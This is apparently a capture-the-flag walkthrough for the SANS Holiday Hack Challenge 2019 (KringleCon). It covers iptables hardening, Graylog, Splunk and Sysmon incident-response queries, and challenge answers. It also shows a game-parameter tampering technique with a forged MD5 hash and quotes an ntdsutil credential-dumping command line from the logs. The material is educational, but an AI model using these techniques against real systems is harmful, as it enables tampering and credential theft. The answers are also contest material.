PS> (Invoke-WebRequest -Uri http://localhost:1225/api/on).RawContent
PS> (Invoke-WebRequest -Uri http://localhost:1225/api/output).RawContent
::
Success! - 6.09 Mega-Jollies of Laser Output Reached!
Misc¶
Common command abbreviations:
Get-Content |
gc |
Get-ChildItem |
gci |
Get-Process |
gps |
Stop-Process |
kill |
Smart Braces¶
Goal¶
Help Kent configure the firewall on his braces.
Location¶
Student Union
Dialog¶
Kent Tinseltooth¶
- Before Solving
OK, this is starting to freak me out!
Oh sorry, I'm Kent Tinseltooth. My Smart Braces are acting up.
Oh sorry, I'm Kent Tinseltooth. My Smart Braces are acting up.
Do... Do you ever get the feeling you can hear things? Like, voices?
I know, I sound crazy, but ever since I got these... Oh!
Do you think you could take a look at my Smart Braces terminal?
I'll bet you can keep other students out of my head, so to speak.
It might just take a bit of Iptables work.
- From The Challenge
Inner Voice: Kent. Kent. Wake up, Kent.
Inner Voice: I'm talking to you, Kent.
Kent TinselTooth: Who said that? I must be going insane.
Kent TinselTooth: Am I?
Inner Voice: That remains to be seen, Kent. But we are having a conversation.
Inner Voice: This is Santa, Kent, and you've been a very naughty boy.
Kent TinselTooth: Alright! Who is this?! Holly? Minty? Alabaster?
Inner Voice: I am known by many names. I am the boss of the North Pole. Turn to me and be hired after graduation.
Kent TinselTooth: Oh, sure.
Inner Voice: Cut the candy, Kent, you've built an automated, machine-learning, sleigh device.
Kent TinselTooth: How did you know that?
Inner Voice: I'm Santa - I know everything.
Kent TinselTooth: Oh. Kringle. *sigh*
Inner Voice: That's right, Kent. Where is the sleigh device now?
Kent TinselTooth: I can't tell you.
Inner Voice: How would you like to intern for the rest of time?
Kent TinselTooth: Please no, they're testing it at srf.elfu.org using default creds, but I don't know more. It's classified.
Inner Voice: Very good Kent, that's all I needed to know.
Kent TinselTooth: I thought you knew everything?
Inner Voice: Nevermind that. I want you to think about what you've researched and studied. From now on, stop playing with your teeth, and floss more.
*Inner Voice Goes Silent*
Kent TinselTooth: Oh no, I sure hope that voice was Santa's.
Kent TinselTooth: I suspect someone may have hacked into my IOT teeth braces.
Kent TinselTooth: I must have forgotten to configure the firewall...
Kent TinselTooth: Please review /home/elfuuser/IOTteethBraces.md and help me configure the firewall.
Kent TinselTooth: Please hurry; having this ribbon cable on my teeth is uncomfortable.
Kent TinselTooth: Great, you hardened my IOT Smart Braces firewall!
If you don’t solve it fast enough:
Kent TinselTooth: Is the firewall fixed yet? I can't stand much more of having this cable on my teeth. You've got 5 more minutes before I'm yanking it!
Kent TinselTooth: One more minute before I'm yanking this cable!
Kent TinselTooth: I can't take it anymore!
*yanks cable from IOT braces - disconnected*
- After Solving
Oh thank you! It's so nice to be back in my own head again. Er, alone.
By the way, have you tried to get into the crate in the Student Union? It has an interesting set of locks.
There are funny rhymes, references to perspective, and odd mentions of eggs!
And if you think the stuff in your browser looks strange, you should see the page source...
Special tools? No, I don't think you'll need any extra tooling for those locks.
BUT - I'm pretty sure you'll need to use Chrome's developer tools for that one.
Or sorry, you're a Firefox fan?
Yeah, Safari's fine too - I just have an ineffible hunger for a physical Esc key.
Edge? That's cool. Hm? No no, I was thinking of an unrelated thing.
Curl fan? Right on! Just remember: the Windows one doesn't like double quotes.
Old school, huh? Oh sure - I've got what you need right here...
Solution¶
Hint
Answer
Warning
If you’re having trouble submitting the firewall rules, ensure you didn’t “CTRL+C” the dialog. You can press enter to skip it.
Explanation¶
- 1. Set the default policies to DROP for the INPUT, FORWARD, and OUTPUT chains.
..``sudo iptables -P INPUT DROP``
| sudo iptables -P OUTPUT DROP
| sudo iptables -P FORWARD DROP
- 2. Create a rule to ACCEPT all connections that are ESTABLISHED,RELATED on the INPUT and the OUTPUT chains.
..``sudo iptables -A INPUT -m state –state ESTABLISHED,RELATED -j ACCEPT``
| sudo iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
- 3. Create a rule to ACCEPT only remote source IP address 172.19.0.225 to access the local SSH server (on port 22).
sudo iptables -A INPUT -p tcp -s 172.19.0.225 --dport 22 -j ACCEPT
- 4. Create a rule to ACCEPT any source IP to the local TCP services on ports 21 and 80.
sudo iptables -A INPUT -p tcp -m multiport --dports 21,80 -j ACCEPT
- 5. Create a rule to ACCEPT all OUTPUT traffic with a destination TCP port of 80.
sudo iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT
- 6. Create a rule applied to the INPUT chain to ACCEPT all traffic from the lo interface.
sudo iptables -A INPUT -i lo -j ACCEPT
Frosty Keypad¶
Goal¶
Gain access to the Dorms
Location¶
The Quad
Dialog¶
Tangle Coalbox¶
- Before Solving
Hey kid, it's me, Tangle Coalbox.
I'm sleuthing again, and I could use your help.
Ya see, this here number lock's been popped by someone.
I think I know who, but it'd sure be great if you could open this up for me.
I've got a few clues for you.
1. One digit is repeated once.
2. The code is a prime number.
3. You can probably tell by looking at the keypad which buttons are used.
- After Solving
Yep, that's it. Thanks for the assist, gumshoe.
Hey, if you think you can help with another problem, Prof. Banas could use a hand too.
Head west to the other side of the quad into Hermey Hall and find him in the Laboratory.
Explanation¶
Looking at the keypad we can tell that the 1, 3, and 7 keys are the most used. With the hints from Tangle, we know the number is prime and it’s a four digit code (since one digit is repeated twice). Given a list of 4 digit prime numbers, we can filter for only numbers that only contain 1, 3, or 7, then for numbers that include 1, 3, and 7. From that, we are left with a list of five.
https://en.wikipedia.org/wiki/List_of_prime_numbers
egrep '[137]{4}' primes | grep 1 | grep 3 | grep 7
1373
1733
3137
3371
7331
Looking at this list, we will notice that 7331 is 1337 (leet) backwards. Trying this code gives us access to the dorms.
Graylog¶
Goal¶
Use Graylog to trace an incident on ElfU’s machines.
Location¶
Dorms
Dialog¶
Pepper Minstix¶
- Before Solving
It's me - Pepper Minstix.
Normally I'm jollier, but this Graylog has me a bit mystified.
Have you used Graylog before? It is a log management system based on Elasticsearch, MongoDB, and Scala.
Some Elf U computers were hacked, and I've been tasked with performing incident response.
Can you help me fill out the incident response report using our instance of Graylog?
It's probably helpful if you know a few things about Graylog.
Event IDs and Sysmon are important too. Have you spent time with those?
Don't worry - I'm sure you can figure this all out for me!
Click on the All messages Link to access the Graylog search interface!
Make sure you are searching in all messages!
The Elf U Graylog server has an integrated incident response reporting system. Just mouse-over the box in the lower-right corner.
Login with the username elfustudent and password elfustudent.
- After Solving
That's it - hooray!
Have you had any luck retrieving scraps of paper from the Elf U server?
You might want to look into SQL injection techniques.
OWASP is always a good resource for web attacks.
For blind SQLi, I've heard Sqlmap is a great tool.
In certain circumstances though, you need custom tamper scripts to get things going!
Explanation¶
Graylog challenge.
- Question 1
Minty CandyCane reported some weird activity on his computer after he clicked on a link in Firefox for a cookie recipe and downloaded a file.
What is the full-path + filename of the first malicious file downloaded by Minty?
Answer
C:\Users\minty\Downloads\cookie_recipe.exe
We can look for file write events from firefox with EventId=2 AND ProcessImage:/.*firefox.exe/ AND TargetFilenae:/.*Downloads.*/
- Question 2
The malicious file downloaded and executed by Minty gave the attacker remote access to his machine. What was the ip:port the malicious file connected to first?
Let’s look for cookie_recipe’s processes where a destination ip exists.
_exists_:DestinationIp AND ProcessImage:C\:\\Users\\minty\\Downloads\\cookie_recipe.exe
Answer
192.168.247.175:4444
- Question 3
What was the first command executed by the attacker?(answer is a single word)
We can set cookie_recipe to be the parent process and see what spawns from it
source:"elfu\-res\-wks1" AND ParentProcessCommandLine:\"C\:\\Users\\minty\\Downloads\\cookie_recipe.exe\"
Answer
whoami
- Question 4
What is the one-word service name the attacker used to escalate privileges?
Using the same search as before, if we keep stepping through the commands, we’ll see our answer.
source:"elfu\-res\-wks1" AND ParentProcessCommandLine:\"C\:\\Users\\minty\\Downloads\\cookie_recipe.exe\"
Answer
webexservice
- Question 5
What is the file-path + filename of the binary ran by the attacker to dump credentials?
During our last query we should have seen cookie_recipe downloading cookie_recipe2. If we look at what cookie_recipe2 does, we’ll see it attempting to steal credentials with mimikatz. It’s not clear what happens, but we can see the attacker trying several times, eventually downloading a binary called cookie.exe and running it with the mimikatz parameters.
source:"elfu\-res\-wks1" AND ParentProcessImage:C\:\\Users\\minty\\Downloads\\cookie_recipe2.exe
Answer
C:cookie.exe
- Question 6
The attacker pivoted to another workstation using credentials gained from Minty’s computer. Which account name was used to pivot to another machine?
Successful logon events will create a 4624 windows event. Combining that with the attacker’s ip address that we figured out in question 2, we can get our answer.
EventID:4624 AND SourceNetworkAddress:192.168.247.175
Answer
alabaster
- Question 7
What is the time ( HH:MM:SS ) the attacker makes a Remote Desktop connection to another machine?
Using the same search as 6, we can filter out for logon type 10, which is the code for a remote interactive authentication.
EventID:4624 AND SourceNetworkAddress:192.168.247.175 AND LogonType:10
Answer
06:04:28
- Question 8
The attacker navigates the file system of a third host using their Remote Desktop Connection to the second host. What is the SourceHostName,DestinationHostname,LogonType of this connection? (submit in that order as csv)
Again looking for successful logons, we can also look for logon type 3, network authentication, which is what you would see if the attacker used windows.exe or something similar to remotely connect to the filesystem. Since we know we’re not looking for elfu-res-wk2, we can exclude it from our search
EventID:4624 AND LogonType:3 AND NOT DestinationHostname:elfu\-res\-wks2
Answer
elfu-res-wks2,elfu-res-wks3,3
- Question 9
What is the full-path + filename of the secret research document after being transferred from the third host to the second host?
Again we can look for file creation events with EventID 2 and specify the source machine. To pair down our results, we can limit our timeframe to after the authentication in question 8.
source:elfu\-res\-wks2 AND EventID:2
Answer
C:UsersalabasterDesktopsuper_secret_elfu_research.pdf
- Question 10
What is the IPv4 address (as found in logs) the secret research document was exfiltrated to?
Continuing on or previous search if we expand our timeframe out and step through the events, we’ll see a powershell process POSTing out to pastebin. The IP can be found in the event immedialy following the powershell process.
Answer
104.22.3.84
Holiday Hack Trail¶
Goal¶
Make it to the KringleCon before Christmas (without dying).
Location¶
Dorms
Dialog¶
Minty Candycane¶
- Before Solving
Hi! I'm Minty Candycane!
I just LOVE this old game!
I found it on a 5 1/4" floppy in the attic.
You should give it a go!
If you get stuck at all, check out this year's talks.
One is about web application penetration testing.
Good luck, and don't get dysentery!
- After Solving
You made it - congrats!
Have you played with the key grinder in my room? Check it out!
It turns out: if you have a good image of a key, you can physically copy it.
Maybe you'll see someone hopping around with a key here on campus.
Sometimes you can find it in the Network tab of the browser console.
Deviant has a great talk on it at this year's Con.
He even has a collection of key bitting templates for common vendors like Kwikset, Schlage, and Yale.
Solution¶
Explanation¶
- Easy
All of the parameters for supplies and completion are in the GET requests, which means they can be manipulated in the url bar. There is no server-side validation of the parameters, so to complete the game, all one needs to do is change the distance parameter to 8000 (the total distance needed), and click “Go”. This will jump you to the completion screen.
hhc://trail.hhc/trail/?difficulty=0&distance=8000&money=5000&pace=0&curmonth=7&curday=1&reindeer=2&runners=2&ammo=100&meds=20&food=400&name0=Chloe&health0=100&cond0=0&causeofdeath0=&deathday0=0&deathmonth0=0&name1=Joseph&health1=100&cond1=0&causeofdeath1=&deathday1=0&deathmonth1=0&name2=Herbert&health2=100&cond2=0&causeofdeath2=&deathday2=0&deathmonth2=0&name3=Jane&health3=100&cond3=0&causeofdeath3=&deathday3=0&deathmonth3=0
The important parameters in the game are:
param |
info |
|---|---|
difficulty |
difficulty level (0==easy, 1==medium, 2==hard |
distance |
distance you travelled (max: 8000) |
money |
$$$ (max: 6000) |
curmonth |
current month (we hope you can figure this one out) |
curday |
current day (we didn’t validate each month) |
reindeer |
number of reindeer (max: 255) |
runners |
number of sleigh runners (max: 255) |
ammo |
to hunt if you need food (max: 65535) |
meds |
to heal sick folks, maybe (max: 65535) |
food |
vittles (max: 65535) |
It was simple to find the maximums for the parameters in easy mode by increasing the parameters until you get a message complaining about a bad parameter. In the screenshot below, you can see that the money was increased beyond what is allowed and the error “badMoneyAmt” was triggered.
- Medium
To manipulate the POST parameters, you can go to the “Intercept” tab and change the parameters just as in easy mode. There is no server-side verification of what the client is sending.
By using the table above to set the maximums for the POST parameters, you can complete the game and get the max score.
- Hard
If you attempt to manipulate the parameters now, the hash will be incorrect and you will fall off the trail.
Looking at the hash, it appears to be an MD5 checksum. It turns out, that the md5 is generated by adding up the values of reindeer, runners, money, distance, curmonth, curday, food, ammo, and meds. If you then pass this into md5sum as a string, you get a correct hash to verify the parameters. It’s important to note that you don’t want additional newline characters appended to the string you feed into the md5 hash generator, so we were careful to use the appropriate flags in /bin/echo.
[rand0macc3ss]$ echo "5 + 2 + 10 + 5 + 20 + 1295" | bc
133
[rand0macc3ss]$ /bin/echo -n "1337" | md5sum
e48e13207341b6bffb7fb1622282247b -
By calculating the correct hash, it is possible to manipulate the parameters as you please and beat the game. We found a way to get an even higher score, since we noticed the number of days before Christmas was calculated into the final score. By setting the curday to 25, and curmonth to 12 (Christmas day), since the game increments curday by 1, it will say that you completed the game 364 days before Christmas. Combining that with the max-values for the params that we brute-forced earlier, you can achieve an even higher final score as demonstrated in the following screencap.
But that isn’t the last thing to find in this challenge. Earlier in game, a certain elf tells you that if you complete Holiday Hack Trail on hard, there will be a special hint on the last page. By viewing the source of the page, you can find an additional comment tag with some handy tips for completing the Sleigh Workshop Door challenge.
Zeek JSON Analysis¶
Goal¶
Find the IP Address with the longest connection in the Zeek logfile.
Location¶
Sleigh Shop
Dialog¶
Wunorse Openslae¶
- Before Solving
- After Solving
That's got to be the one - thanks!
Hey, you know what? We've got a crisis here.
You see, Santa's flight route is planned by a complex set of machine learning algorithms which use available weather data.
All the weather stations are reporting severe weather to Santa's Sleigh. I think someone might be forging intentionally false weather data!
I'm so flummoxed I can't even remember how to login!
Hmm... Maybe the Zeek http.log could help us.
I worry about LFI, XSS, and SQLi in the Zeek log - oh my!
And I'd be shocked if there weren't some shell stuff in there too.
I'll bet if you pick through, you can find some naughty data from naughty hosts and block it in the firewall.
If you find a log entry that definitely looks bad, try pivoting off other unusual attributes in that entry to find more bad IPs.
The sleigh's machine learning device (SRF) needs most of the malicious IPs blocked in order to calculate a good route.
Try not to block many legitimate weather station IPs as that could also cause route calculation failure.
Remember, when looking at JSON data, jq is the tool for you!
Explanation¶
We can use jq to parse through the zeek file. Since we’re looking for the ip with the longest connection, we can use jq’s max_by function to find the highest value of “.duration” and get the ip address for that event.
Once we have the ip address, we just need to run runtoanswer to get credit.
Objectives¶
0) Talk to Santa in the Quad¶
Goal¶
Enter the campus quad and talk to Santa.
Location¶
The Quad
Dialog¶
This is a little embarrassing, but I need your help.
Our KringleCon turtle dove mascots are missing!
They probably just wandered off.
Can you please help find them?
To help you search for them and get acquainted with KringleCon, I’ve created some objectives for you. You can see them in your badge.
Where's your badge? Oh! It's that big, circle emblem on your chest - give it a tap!
We made them in two flavors - one for our new guests, and one for those who've attended both KringleCons.
After you find the Turtle Doves and complete objectives 2-5, please come back and let me know.
Not sure where to start? Try hopping around campus and talking to some elves.
If you help my elves with some quicker problems, they'll probably remember clues for the objectives.
Solution¶
Leave the train station (where you start) and talk to Santa.
1) Find the Turtle Doves¶
Goal¶
Find the missing turtle doves.
Location¶
Student Union
Solution¶
You can find the doves in the Student Union next to the fireplace.
2) Unredact Threatening Document¶
Goal¶
Someone sent a threatening letter to Elf University. What is the first word in ALL CAPS in the subject line of the letter? Please find the letter in the Quad.
Location¶
The Quad
Solution¶
Answer
DEMAND
Date: February 28, 2019
To the Administration, Faculty, and Staff of Elf University
17 Christmas Tree Lane
North Pole
From: A Concerned and Aggrieved Character
Subject: DEMAND: Spread Holiday Cheer to Other Holidays and Mythical Characters… OR
ELSE!
Attention All Elf University Personnel,
It remains a constant source of frustration that Elf University and the entire operation at the
North Pole focuses exclusively on Mr. S. Claus and his year-end holiday spree. We URGE
you to consider lending your considerable resources and expertise in providing merriment,
cheer, toys, candy, and much more to other holidays year-round, as well as to other mythical
characters.
For centuries, we have expressed our frustration at your lack of willingness to spread your
cheer beyond the inaptly-called “Holiday Season.” There are many other perfectly fine
holidays and mythical characters that need your direct support year-round.
If you do not accede to our demands, we will be forced to take matters into our own hands.
We do not make this threat lightly. You have less than six months to act demonstrably.
Sincerely,
--A Concerned and Aggrieved Character
Explanation¶
The letter can be located in the Northwest corner of The Quad. After opening the document, simply highlight the text and paste it into your favorite text editor.
Optionally, you could run pdftotxt to achieve the same result.
3) Windows Log Analysis: Evaluate Attack Outcome¶
Goal¶
We’re seeing attacks against the Elf U domain! Using the event log data, identify the user account that the attacker compromised using a password spray attack. Bushy Evergreen is hanging out in the train station and may be able to help you out.
Explanation¶
A password spray attack is similar to a brute force attack, except rather than trying a lot of passwords against a few users, you try a lot of users with a few passwords. This has the benifit of not triggering account lockout events, but is still very noisy if anyone is paying attention. This will generate a spike in 4625 (Failed Logon) events.
For this challenge, we’re told the attack was successful, this means we should see 4624 (Successful Logon) events. If we’re on Windows, we can use the DeepBlueCLI to parse the event logs and show us the successful logon.
Alternatively, on linux we can use the python-evtx project’s scripts to dump the data.
4) Windows Log Analysis: Determine Attacker Technique¶
Goal¶
Using these normalized Sysmon logs, identify the tool the attacker used to retrieve domain password hashes from the lsass.exe process. For hints on achieving this objective, please visit Hermey Hall and talk with SugarPlum Mary.
Explanation¶
Using process of elimination, we can remove events that we know we’re not looking for until we see ntdsutil.
cat sysmon-data.json | jq '.[] | select(.event_type=="process") | select(.process_name!="wevtutil.exe") | select(.process_name!="net.exe")' | less
ntdsutil.exe is the binary that domain controllers use to interact with the domain password store - if you ever see this running, you should probably check it out.
https://adsecurity.org/?p=2398
https://www.carbonblack.com/cbfeeds/cbcommunity_feed.xhtml#4
Alternatively, we could use eql to query the event logs. From the hint, we get this search to look for important ntdsutil events.
eql query -f sysmon-data.json 'process where process_name == "ntdsutil.exe" and command_line == "*create*" and command_line == "*ifm*"' | jq
{
"command_line": "ntdsutil.exe \"ac i ntds\" ifm \"create full c:\\hive\" q q",
"event_type": "process",
"logon_id": 999,
"parent_process_name": "cmd.exe",
"parent_process_path": "C:\\Windows\\System32\\cmd.exe",
"pid": 3556,
"ppid": 3440,
"process_name": "ntdsutil.exe",
"process_path": "C:\\Windows\\System32\\ntdsutil.exe",
"subtype": "create",
"timestamp": 132186398470300000,
"unique_pid": "{7431d376-dee7-5dd3-0000-0010f0c44f00}",
"unique_ppid": "{7431d376-dedb-5dd3-0000-001027be4f00}",
"user": "NT AUTHORITY\\SYSTEM",
"user_domain": "NT AUTHORITY",
"user_name": "SYSTEM"
}
5) Network Log Analysis: Determine Compromised System¶
Goal¶
The attacks don’t stop! Can you help identify the IP address of the malware-infected system using these Zeek logs? For hints on achieving this objective, please visit the Laboratory and talk with Sparkle Redberry.
Explanation¶
Despite the 1.5Gb of logs, this one is pretty simple. In your web browser, open the index.html located in <unzip dir>/ELFU/ELFU, select the ELFU database, and go to the “beacons” tab at the top. The first entry, with the highest number of beacons, is coming from 192.168.134.130.
6) Splunk¶
Goal¶
Access https://splunk.elfu.org/ as elf with password elfsocks. What was the message for Kent that the adversary embedded in this attack? The SOC folks at that link will help you along! For hints on achieving this objective, please visit the Laboratory in Hermey Hall and talk with Prof. Banas.
Dialog¶
Professor Banas¶
- Before Solving
Hi, I'm Dr. Banas, professor of Cheerology at Elf University.
This term, I'm teaching "HOL 404: The Search for Holiday Cheer in Popular Culture," and I've had quite a shock!
I was at home enjoying a nice cup of Gløgg when I had a call from Kent, one of my students who interns at the Elf U SOC.
Kent said that my computer has been hacking other computers on campus and that I needed to fix it ASAP!
If I don't, he will have to report the incident to the boss of the SOC.
Apparently, I can find out more information from this website https://splunk.elfu.org/ with the username: elf / Password: elfsocks.
I don't know anything about computer security. Can you please help me?
- After Solving
Oh, thanks so much for your help! Sorry I was freaking out.
I've got to talk to Kent about using my email again...
...and picking up my dry cleaning.
Solution¶
Answer
Kent you are so unfair. And we were going to make you the king of the Winter Carnival.
Explanation¶
- 1. What is the short host name of Professor Banas’ computer?
This can be found in the chat log on the main splunk page, under “#ELF SOC”.
Answer
sweetums
- 2. What is the name of the sensitive file that was likely accessed and copied by the attacker?
Please provide the fully qualified location of the file. (Example: C:tempreport.pdf)
This can be found by looking for “Documents”.
Answer
C:UserscbanasDocumentsNaughty_and_Nice_2019_draft.txt
- 3. What is the fully-qualified domain name(FQDN) of the command and control(C2) server?
Answer
144.202.46.214.vultr.com
- 4. What document is involved with launching the malicious PowerShell code?
Please provide just the filename. (Example: results.txt)
Looking through the stoq logs, we can extract all of the filenames. Knowing common attack vectors for powershell, we can look for docm files which are macro-enabled word documents.
sourcetype=stoq
| top limit=200 "results{}.payload_meta.extra_data.filename"
Answer
19th century holiday cheer assignment.docm
- 5. How many unique email addresses were used to send Holiday Cheer essays to Professor Banas?:
Please provide the numeric value. (Example: 1)
This search is getting all emails with a subject containing “assignment”, excluding any from Carl Banas. We then rename the from variable because eval doesn’t like having special characters. eval is formatting the from field, turning everything to lowercase. And lastly stats is counting how many “from” addresses we have.
sourcetype=stoq "results{}.workers.smtp.subject"="*assignment*" AND results{}.workers.smtp.from!="*carl banas*"
| rename results{}.workers.smtp.from as from
| eval from=lower(from)
| stats count by from
Answer
21
- 6. What was the password for the zip archive that contained the suspicious file?
"19th century holiday cheer assignment.docm" zip password
Answer
123456789
- 7. What email address did the suspicious file come from?
Same search as 6.
Answer
- Challenge
If we click into the directory structure until we come to a file, we can use the base url to grab the xml file for the bucket wget http://elfu-soc.s3-website-us-east-1.amazonaws.com
With that file, we can loop through all the “Key” values and copy all files to our local machine
for i in `cat ../index.html | grep -Po '<Key>\K.*?(?=</Key>)'`; do wget "http://elfu-soc.s3-website-us-east-1.amazonaws.com/$i"; done
If we read the “c6e175f5b8048c771b3a3fac5f3295d2032524af” file, which was the “19th century holiday cheer assignment.docm”, we get a hint:
Hint
Cleaned for your safety. Happy Holidays!
In the real world, This would have been a wonderful artifact for you to investigate, but it had malware in it of course so it’s not posted here. Fear not! The core.xml file that was a component of this original macro-enabled Word doc is still in this File Archive thanks to stoQ. Find it and you will be a happy elf :-)
sourcetype=stoq
| eval results = spath(_raw, "results{}")
| mvexpand results
| eval path=spath(results, "archivers.filedir.path"), filename=spath(results, "payload_meta.extra_data.filename"), hash=mvindex(split(path, "/"), -1)
| where filename!="" AND hash!=""
| table filename hash
eval is pulling out the “results” values and placing them in results. Since this has multiple values, and we want them all, we can use mvexpand to separate the values of results into their own events. The second eval is pulling out the filename and hash from the json structure. where is makeing sure that the results we give contain both a filename and file hash. Finally, we throw the filename and hash into a table. At this point we can export our results into a csv.for i in `cat ../filenames.csv | awk -F, '{print $2}'`; do find . -name $i -exec mv --backup=numbered '{}' `grep $i ../filenames.csv | awk -F, '{print $1}'`; done
--backup=numbered in the mv command so we don’t overwrite files with the same name.After doing this, we can see the core.xml file from the hint
cat \"core.xml*
grep Kent \"core*
Kent you are so unfair. And we were going to make you the king of the Winter Carnival.
Misc¶
There are other interesting files that we’ve pulled down from stoQ.
'"1574354474.Vca01I45ce4M696784.ip-172-31-47-72"' '"1574356621.Vca01I45e42M687111.ip-172-31-47-72"' cd368f3fe44e76694ceeeb4cc8a134ab3d76c61e '"document.xml".~5~' '"image1.jpg".~1~' '"settings.xml".~8~'
'"1574354653.Vca01I45cf5M196619.ip-172-31-47-72"' '"1574356658.Vca01I45e44M667617.ip-172-31-47-72"' '"children.docx"' '"document.xml".~6~' '"image1.jpg".~2~' '"settings.xml".~9~'
'"1574354767.Vca01I45d06M169567.ip-172-31-47-72"' '"1574357297.Vca01I45e4aM628018.ip-172-31-47-72"' '"[Content_Types].xml"' '"document.xml".~7~' '"image1.jpg".~3~' '"Silver.docx"'
'"1574354772.Vca01I45d08M562531.ip-172-31-47-72"' 167bad5014cc3ede461c9950a663211b1e1da7ad '"[Content_Types].xml".~1~' '"document.xml".~8~' index.html '"Snowtrifle_HOL404_assignment.docx"'
'"1574354775.Vca01I45d1fM923725.ip-172-31-47-72"' '"19th Century Holiday Cheer Assignment.docm"' '"core.xml"' '"document.xml".~9~' index.html.1 '"stonehenge.docx"'
'"1574354785.Vca01I45d31M851388.ip-172-31-47-72"' 1c6ea6f221c54bb841820f948d9695e867bef255 '"core.xml".~1~' '"document.xml.rels"' '"item1.xml"' '"styles.xml"'
'"1574354824.Vca01I45d35M925783.ip-172-31-47-72"' 23dc859021a9ab594d4b19d6fd2eaf8bc95a7ec8 '"core.xml".~10~' '"document.xml.rels".~1~' '"item1.xml".~1~' '"styles.xml".~1~'
'"1574354888.Vca01I45d3cM335779.ip-172-31-47-72"' 41cc8f912e71f3c39c2dfe67c1accc2c88fef1e8 '"core.xml".~11~' '"document.xml.rels".~2~' '"item1.xml.rels"' '"styles.xml".~2~'
'"1574354911.Vca01I45d3eM592054.ip-172-31-47-72"' 46ab20789f48c66666cef3f8bda8200bff838dc9 '"core.xml".~12~' e4cbafbb158e963fd62709dbe9497a7ba2811619 '"item1.xml.rels".~1~' '"styles.xml".~3~'
'"1574355009.Vca01I45d52M802303.ip-172-31-47-72"' 5aaecf568786df96b416aae5ad6e9cf55fd4b09e '"core.xml".~13~' e9ee94df06110906f17419afa38e43cdbe90993f '"itemProps1.xml"' '"styles.xml".~4~'
'"1574355070.Vca01I45d58M385070.ip-172-31-47-72"' 8210c28b1b5f9a645795a9688abb0e0e7da7858e '"core.xml".~14~' '"evergreen_essay.docx"' '"itemProps1.xml".~1~' '"styles.xml".~5~'
'"1574355108.Vca01I45d68M958758.ip-172-31-47-72"' 9d7abf0ee4effcecad80c8bbfb276079a05b4342 '"core.xml".~15~' f5cba8a650d6ada98d170f1b22098d93b8ff8879 '"ivytraditions.docx"' '"styles.xml".~6~'
'"1574355115.Vca01I45d77M273023.ip-172-31-47-72"' a69bf81481d8551d368a311ba90668a4684e26d0 '"core.xml".~16~' favicon.ico '"lights_of_cheer.docx"' '"Sugartree_HOL404_assignment.docx"'
'"1574355169.Vca01I45d7eM377180.ip-172-31-47-72"' a87b07498065bc8b32fe0ae677f66f8e2edabf25 '"core.xml".~17~' filenames.csv list.js '"The Bells of St Marys.docx"'
'"1574355176.Vca01I45d89M713227.ip-172-31-47-72"' '"adventures.docx"' '"core.xml".~18~' '"fontTable.xml"' '"nightbefore.docx"' '"TimesSquare.docx"'
'"1574355245.Vca01I45d90M217695.ip-172-31-47-72"' '"Antiochus Epiphanes.docx"' '"core.xml".~2~' '"fontTable.xml".~1~' '"numbering.xml"' '"vbaData.xml"'
'"1574355245.Vca01I45d96M944029.ip-172-31-47-72"' '"app.xml"' '"core.xml".~3~' '"fontTable.xml".~2~' '"nutcracker.docx"' '"vbaProject.bin.rels"'
'"1574355315.Vca01I45da5M715298.ip-172-31-47-72"' '"app.xml".~1~' '"core.xml".~4~' '"fontTable.xml".~3~' '"oh_henry.docx"' '"village+people.docx"'
'"1574355335.Vca01I45db5M219061.ip-172-31-47-72"' '"app.xml".~10~' '"core.xml".~5~' '"fontTable.xml".~4~' '".rels"' '"webSettings.xml"'
'"1574355376.Vca01I45dbcM709275.ip-172-31-47-72"' '"app.xml".~11~' '"core.xml".~6~' '"fontTable.xml".~5~' '"Rudolph.docx"' '"webSettings.xml".~1~'
'"1574355450.Vca01I45dcfM118134.ip-172-31-47-72"' '"app.xml".~12~' '"core.xml".~7~' '"Frank.docx"' '"settings.xml"' '"webSettings.xml".~10~'
'"1574355488.Vca01I45dd6M481408.ip-172-31-47-72"' '"app.xml".~13~' '"core.xml".~8~' '"holiday inn.docx"' '"settings.xml".~1~' '"webSettings.xml".~11~'
'"1574355501.Vca01I45dd8M38371.ip-172-31-47-72"' '"app.xml".~14~' '"core.xml".~9~' '"image1.jpeg"' '"settings.xml".~10~' '"webSettings.xml".~12~'
'"1574355569.Vca01I45ddfM886475.ip-172-31-47-72"' '"app.xml".~15~' '"document.xml"' '"image1.jpeg".~1~' '"settings.xml".~11~' '"webSettings.xml".~13~'
'"1574355587.Vca01I45e02M98236.ip-172-31-47-72"' '"app.xml".~16~' '"document.xml".~1~' '"image1.jpeg".~10~' '"settings.xml".~12~' '"webSettings.xml".~14~'
'"1574355608.Vca01I45e04M305039.ip-172-31-47-72"' '"app.xml".~17~' '"document.xml".~10~' '"image1.jpeg".~11~' '"settings.xml".~13~' '"webSettings.xml".~15~'
'"1574355715.Vca01I45e0eM164521.ip-172-31-47-72"' '"app.xml".~18~' '"document.xml".~11~' '"image1.jpeg".~12~' '"settings.xml".~14~' '"webSettings.xml".~16~'
'"1574355850.Vca01I45e10M816560.ip-172-31-47-72"' '"app.xml".~19~' '"document.xml".~12~' '"image1.jpeg".~13~' '"settings.xml".~15~' '"webSettings.xml".~17~'
'"1574355906.Vca01I45e14M669970.ip-172-31-47-72"' '"app.xml".~2~' '"document.xml".~13~' '"image1.jpeg".~14~' '"settings.xml".~16~' '"webSettings.xml".~18~'
'"1574356016.Vca01I45e16M856839.ip-172-31-47-72"' '"app.xml".~3~' '"document.xml".~14~' '"image1.jpeg".~15~' '"settings.xml".~17~' '"webSettings.xml".~19~'
'"1574356102.Vca01I45e18M48370.ip-172-31-47-72"' '"app.xml".~4~' '"document.xml".~15~' '"image1.jpeg".~2~' '"settings.xml".~18~' '"webSettings.xml".~2~'
'"1574356152.Vca01I45e1dM244094.ip-172-31-47-72"' '"app.xml".~5~' '"document.xml".~16~' '"image1.jpeg".~3~' '"settings.xml".~19~' '"webSettings.xml".~3~'
'"1574356216.Vca01I45e28M222654.ip-172-31-47-72"' '"app.xml".~6~' '"document.xml".~17~' '"image1.jpeg".~4~' '"settings.xml".~2~' '"webSettings.xml".~4~'
'"1574356268.Vca01I45e2aM303980.ip-172-31-47-72"' '"app.xml".~7~' '"document.xml".~18~' '"image1.jpeg".~5~' '"settings.xml".~20~' '"webSettings.xml".~5~'
'"1574356310.Vca01I45e2cM258120.ip-172-31-47-72"' '"app.xml".~8~' '"document.xml".~19~' '"image1.jpeg".~6~' '"settings.xml".~3~' '"webSettings.xml".~6~'
